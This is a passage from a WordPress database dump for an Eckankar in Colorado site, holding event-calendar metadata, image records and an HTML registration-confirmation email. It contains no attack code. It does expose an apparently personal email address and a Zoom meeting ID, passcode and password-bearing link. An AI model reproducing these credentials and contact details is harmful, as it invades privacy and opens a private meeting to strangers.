Director'),(189942,268893,'_field_105','Testing'),(189938,268893,'_field_99','choll.03@comcast.net'),(189937,268893,'_field_98','Testing'),(185465,266316,'passster_area_shortcode',''),(185466,266316,'mec_cost_auto_calculate','0'),(185467,266316,'mec_style_per_event','global'),(185468,266316,'mec_trailer_url',''),(185469,266316,'mec_trailer_title',''),(185470,266316,'mec_start_datetime','2022-03-20 10:30 AM'),(185471,266316,'mec_end_datetime','2022-03-20 11:30 AM'),(185472,266316,'mec_sequence','4'),(185473,266316,'mec_event_gallery','a:0:{}'),(185474,266316,'mec_related_events','a:0:{}'),(185475,266316,'mec_banner','a:0:{}'),(185476,266625,'passster_area_shortcode',''),(185477,266625,'mec_cost_auto_calculate','0'),(185478,266625,'mec_style_per_event','global'),(185479,266625,'mec_trailer_url',''),(185480,266625,'mec_trailer_title',''),(185481,266625,'mec_start_datetime','2022-05-17 10:30 AM'),(185482,266625,'mec_end_datetime','2022-05-17 10:30 AM'),(185483,266625,'mec_sequence','3'),(185484,266625,'mec_event_gallery','a:0:{}'),(185485,266625,'mec_related_events','a:0:{}'),(185486,266625,'mec_banner','a:0:{}'),(185487,264610,'passster_area_shortcode',''),(185488,264610,'mec_cost_auto_calculate','0'),(185489,264610,'mec_style_per_event','global'),(185490,264610,'mec_trailer_url',''),(185491,264610,'mec_trailer_title',''),(185492,264610,'mec_start_datetime','2022-05-17 10:30 AM'),(185493,264610,'mec_end_datetime','2022-05-17 10:30 AM'),(185494,264610,'mec_sequence','8'),(185495,264610,'mec_event_gallery','a:0:{}'),(185496,264610,'mec_related_events','a:0:{}'),(185497,264610,'mec_banner','a:0:{}'),(185498,266543,'passster_area_shortcode',''),(185499,266543,'mec_cost_auto_calculate','0'),(185500,266543,'mec_style_per_event','global'),(185501,266543,'mec_trailer_url',''),(185502,266543,'mec_trailer_title',''),(185503,266543,'mec_start_datetime','2027-04-15 10:30 AM'),(185504,266543,'mec_end_datetime','2027-04-15 11:30 PM'),(185505,266543,'mec_sequence','7'),(185506,266543,'mec_event_gallery','a:0:{}'),(185507,266543,'mec_related_events','a:0:{}'),(185508,266543,'mec_banner','a:0:{}'),(185509,266540,'passster_area_shortcode',''),(185510,266540,'mec_cost_auto_calculate','0'),(185511,266540,'mec_style_per_event','global'),(185512,266540,'mec_trailer_url',''),(185513,266540,'mec_trailer_title',''),(185514,266540,'mec_start_datetime','2027-05-09 10:30 AM'),(185515,266540,'mec_end_datetime','2027-05-09 11:30 PM'),(185516,266540,'mec_sequence','8'),(193842,269222,'_seq_num','78'),(185517,266540,'mec_event_gallery','a:0:{}'),(185518,266540,'mec_related_events','a:0:{}'),(185519,266540,'mec_banner','a:0:{}'),(185520,266545,'mec_cost_auto_calculate','0'),(185521,266545,'mec_style_per_event','global'),(185522,266545,'mec_trailer_url',''),(185523,266545,'mec_trailer_title',''),(185524,266545,'mec_start_datetime','2027-04-11 10:30 AM'),(185525,266545,'mec_end_datetime','2027-04-11 11:30 PM'),(185526,266545,'mec_sequence','8'),(185527,266545,'mec_event_gallery','a:0:{}'),(185528,266545,'mec_related_events','a:0:{}'),(185529,266545,'mec_banner','a:0:{}'),(185530,268251,'mec_cost_auto_calculate','0'),(185531,268251,'mec_style_per_event','global'),(185532,268251,'mec_trailer_url',''),(185533,268251,'mec_trailer_title',''),(185534,268251,'mec_start_datetime','2022-01-06 08:00 AM'),(185535,268251,'mec_end_datetime','2022-01-06 06:00 PM'),(185536,268251,'mec_sequence','9'),(185537,268251,'mec_event_gallery','a:0:{}'),(185538,268251,'mec_related_events','a:0:{}'),(185539,268251,'mec_banner','a:0:{}'),(185540,267696,'mec_cost_auto_calculate','0'),(185541,267696,'mec_style_per_event','global'),(185542,267696,'mec_trailer_url',''),(185543,267696,'mec_trailer_title',''),(185544,267696,'mec_start_datetime','2021-04-22 08:00 AM'),(185545,267696,'mec_end_datetime','2021-04-22 06:00 PM'),(185546,267696,'mec_sequence','13'),(190558,265919,'passster_area_shortcode',''),(190559,265919,'mec_cost_auto_calculate','0'),(190560,265919,'mec_style_per_event','global'),(185547,267696,'mec_event_gallery','a:0:{}'),(185548,267696,'mec_related_events','a:0:{}'),(185549,267696,'mec_banner','a:0:{}'),(185550,267895,'passster_area_shortcode',''),(185551,267895,'mec_cost_auto_calculate','0'),(185552,267895,'mec_style_per_event','global'),(185553,267895,'mec_trailer_url',''),(185554,267895,'mec_trailer_title',''),(185555,267895,'mec_start_datetime','2022-03-19 10:30 AM'),(185556,267895,'mec_end_datetime','2022-03-19 12:30 PM'),(185557,267895,'mec_sequence','7'),(185558,267895,'mec_event_gallery','a:0:{}'),(185559,267895,'mec_related_events','a:0:{}'),(185560,267895,'mec_banner','a:0:{}'),(185561,268531,'mec_cost_auto_calculate','0'),(185562,268531,'mec_style_per_event','global'),(185563,268531,'mec_trailer_url',''),(185564,268531,'mec_trailer_title',''),(185565,268531,'mec_start_datetime','2023-06-03 10:30 AM'),(185566,268531,'mec_end_datetime','2023-06-03 11:30 AM'),(185567,268531,'mec_sequence','1'),(185568,268531,'mec_event_gallery','a:0:{}'),(185569,268531,'mec_related_events','a:0:{}'),(185570,268531,'mec_banner','a:0:{}'),(185571,268484,'mec_cost_auto_calculate','0'),(185572,268484,'mec_style_per_event','global'),(185573,268484,'mec_trailer_url',''),(185574,268484,'mec_trailer_title',''),(185575,268484,'mec_start_datetime','2023-06-04 10:30 AM'),(185576,268484,'mec_end_datetime','2023-06-04 11:30 AM'),(185577,268484,'mec_sequence','3'),(185578,268484,'mec_event_gallery','a:0:{}'),(185579,268484,'mec_related_events','a:0:{}'),(185580,268484,'mec_banner','a:0:{}'),(185581,268482,'mec_cost_auto_calculate','0'),(185582,268482,'mec_style_per_event','global'),(185583,268482,'mec_trailer_url',''),(185584,268482,'mec_trailer_title',''),(185585,268482,'mec_start_datetime','2023-06-11 10:30 AM'),(185586,268482,'mec_end_datetime','2023-06-11 11:30 AM'),(185587,268482,'mec_sequence','1'),(185588,268482,'mec_event_gallery','a:0:{}'),(185589,268482,'mec_related_events','a:0:{}'),(185590,268482,'mec_banner','a:0:{}'),(185591,268216,'mec_cost_auto_calculate','0'),(185592,268216,'mec_style_per_event','global'),(185593,268216,'mec_trailer_url',''),(185594,268216,'mec_trailer_title',''),(185595,268216,'mec_start_datetime','2023-06-07 07:00 PM'),(185596,268216,'mec_end_datetime','2023-06-07 08:00 PM'),(185597,268216,'mec_sequence','1'),(185598,268216,'mec_event_gallery','a:0:{}'),(185599,268216,'mec_related_events','a:0:{}'),(185600,268216,'mec_banner','a:0:{}'),(185601,268593,'mec_cost_auto_calculate','0'),(185602,268593,'mec_style_per_event','global'),(185603,268593,'mec_trailer_url',''),(185604,268593,'mec_trailer_title',''),(185605,268593,'mec_start_datetime','2023-06-15 07:00 PM'),(185606,268593,'mec_end_datetime','2023-06-15 08:00 PM'),(185607,268593,'mec_sequence','1'),(185608,268593,'mec_event_gallery','a:0:{}'),(185609,268593,'mec_related_events','a:0:{}'),(185610,268593,'mec_banner','a:0:{}'),(185611,268678,'protect_children',''),(185612,268678,'mec_color',''),(185613,268678,'mec_location_id','118'),(185614,268678,'mec_dont_show_map','0'),(185615,268678,'mec_organizer_id','1'),(185616,268678,'mec_read_more',''),(185617,268678,'mec_more_info',''),(185618,268678,'mec_more_info_title',''),(185619,268678,'mec_more_info_target','_self'),(185620,268678,'mec_cost',''),(185621,268678,'mec_currency','a:0:{}'),(185622,268678,'mec_additional_organizer_ids','a:0:{}'),(185623,268678,'mec_additional_location_ids','a:0:{}'),(185624,268678,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(185625,268678,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(185626,268678,'mec_certain_weekdays','a:0:{}'),(185627,268678,'mec_allday','0'),(185628,268678,'one_occurrence','0'),(185629,268678,'mec_hide_time','0'),(185630,268678,'mec_hide_end_time','0'),(185631,268678,'mec_comment',''),(185632,268678,'mec_timezone','global'),(185633,268678,'mec_countdown_method','global'),(185634,268678,'mec_public','1'),(185635,268678,'mec_start_date','2023-07-02'),(185636,268678,'mec_start_time_hour','10'),(185637,268678,'mec_start_time_minutes','30'),(185638,268678,'mec_start_time_ampm','AM'),(185639,268678,'mec_start_day_seconds','37800'),(185640,268678,'mec_end_date','2023-07-02'),(185641,268678,'mec_end_time_hour','11'),(185642,268678,'mec_end_time_minutes','30'),(185643,268678,'mec_end_time_ampm','AM'),(185644,268678,'mec_end_day_seconds','41400'),(185645,268678,'mec_repeat_status','0'),(185646,268678,'mec_repeat_type',''),(185647,268678,'mec_repeat_interval','1'),(185648,268678,'mec_repeat_end',''),(185649,268678,'mec_repeat_end_at_occurrences',''),(185650,268678,'mec_repeat_end_at_date',''),(185651,268678,'mec_advanced_days','a:0:{}'),(185652,268678,'mec_in_days',''),(185653,268678,'mec_not_in_days',''),(185654,268678,'mec_hourly_schedules','a:0:{}'),(185655,268678,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(185656,268678,'mec_tickets','a:0:{}'),(185657,268678,'mec_fees_global_inheritance','1'),(185658,268678,'mec_fees','a:0:{}'),(185659,268678,'mec_ticket_variations_global_inheritance','1'),(185660,268678,'mec_ticket_variations','a:0:{}'),(185661,268678,'mec_reg_fields_global_inheritance','1'),(185662,268678,'mec_reg_fields','a:0:{}'),(185663,268678,'mec_bfixed_fields','a:0:{}'),(185664,268678,'mec_op','a:0:{}'),(185665,268678,'mec_fields','a:0:{}'),(185666,268678,'mec_event_status','EventScheduled'),(185667,268678,'mec_moved_online_link',''),(185668,268678,'mec_cancelled_reason',''),(185669,268678,'mec_display_cancellation_reason_in_single_page',''),(185670,268678,'boldgrid_hide_page_title','0'),(185671,268678,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(185672,268678,'passster_activate_global_protection',NULL),(185673,268678,'passster_activate_protection',NULL),(185674,268678,'passster_protection_type','password'),(185688,268678,'_dp_original','266104'),(185676,268678,'boldgrid_in_page_containers','1'),(185677,268678,'passster_area_shortcode',''),(185678,268678,'mec_cost_auto_calculate','0'),(185679,268678,'mec_style_per_event','global'),(185680,268678,'mec_trailer_url',''),(185681,268678,'mec_trailer_title',''),(185682,268678,'mec_start_datetime','2023-07-02 10:30 AM'),(185683,268678,'mec_end_datetime','2023-07-02 11:30 AM'),(185684,268678,'mec_sequence','8'),(185685,268678,'mec_event_gallery','a:0:{}'),(185686,268678,'mec_related_events','a:0:{}'),(185687,268678,'mec_banner','a:0:{}'),(185689,268678,'_edit_lock','1687706520:2'),(185690,268678,'_edit_last','2'),(185691,268678,'_thumbnail_id','268485'),(192948,269147,'mec_sequence','15'),(192949,269147,'mec_event_gallery','a:0:{}'),(192950,269147,'mec_related_events','a:0:{}'),(192951,269147,'mec_banner','a:0:{}'),(192953,269147,'_edit_lock','1698600761:2'),(192954,269147,'_edit_last','2'),(192955,269148,'_wp_attached_file','2023/10/maze-sunrise-1.jpg'),(192956,269148,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:947;s:6:\"height\";i:444;s:4:\"file\";s:26:\"2023/10/maze-sunrise-1.jpg\";s:8:\"filesize\";i:184642;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-350x164.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:164;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22235;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9800;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-768x360.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:94278;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34147;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-500x444.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:444;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93594;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:56476;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38435;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"maze-sunrise-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43108;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192957,269149,'mec_color',''),(192958,269149,'mec_location_id','118'),(192959,269149,'mec_dont_show_map','0'),(192960,269149,'mec_organizer_id','1'),(192961,269149,'mec_read_more',''),(192962,269149,'mec_more_info',''),(192963,269149,'mec_more_info_title',''),(192964,269149,'mec_more_info_target','_self'),(192965,269149,'mec_cost',''),(192966,269149,'mec_currency','a:0:{}'),(192967,269149,'mec_additional_organizer_ids','a:0:{}'),(192968,269149,'mec_additional_location_ids','a:0:{}'),(192969,269149,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-30\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-30\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192970,269149,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192971,269149,'mec_certain_weekdays','a:0:{}'),(192972,269149,'mec_allday','0'),(192973,269149,'one_occurrence','0'),(192974,269149,'mec_hide_time','0'),(192975,269149,'mec_hide_end_time','0'),(192976,269149,'mec_comment',''),(192977,269149,'mec_timezone','global'),(192978,269149,'mec_countdown_method','global'),(192979,269149,'mec_public','1'),(192980,269149,'mec_start_date','2023-10-30'),(192981,269149,'mec_start_time_hour','6'),(192982,269149,'mec_start_time_minutes','30'),(192983,269149,'mec_start_time_ampm','PM'),(192984,269149,'mec_start_day_seconds','66600'),(192985,269149,'mec_end_date','2023-10-30'),(192986,269149,'mec_end_time_hour','7'),(192987,269149,'mec_end_time_minutes','30'),(192988,269149,'mec_end_time_ampm','PM'),(192989,269149,'mec_end_day_seconds','70200'),(192990,269149,'mec_repeat_status','0'),(192991,269149,'mec_repeat_type',''),(192992,269149,'mec_repeat_interval','1'),(192993,269149,'mec_repeat_end',''),(192994,269149,'mec_repeat_end_at_occurrences','9'),(192995,269149,'mec_repeat_end_at_date',''),(192996,269149,'mec_advanced_days','a:0:{}'),(192997,269149,'mec_in_days',''),(192998,269149,'mec_not_in_days',''),(192999,269149,'mec_hourly_schedules','a:0:{}'),(193000,269149,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(193039,269148,'original-file','2023/10/maze-sunrise-1-updraft-pre-smush-original.jpg'),(193040,269148,'smush-complete','1'),(193041,269148,'smush-info','The file was compressed from 180.31 KB to 163.23 KB, saving 9.48 percent, using WP-Optimize'),(193001,269149,'mec_tickets','a:0:{}'),(193002,269149,'mec_fees_global_inheritance','1'),(193003,269149,'mec_fees','a:0:{}'),(193004,269149,'mec_ticket_variations_global_inheritance','1'),(193005,269149,'mec_ticket_variations','a:0:{}'),(193006,269149,'mec_reg_fields_global_inheritance','1'),(193007,269149,'mec_reg_fields','a:0:{}'),(193008,269149,'mec_bfixed_fields','a:0:{}'),(193009,269149,'mec_op','a:0:{}'),(193010,269149,'mec_fields','a:0:{}'),(193011,269149,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:10054:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      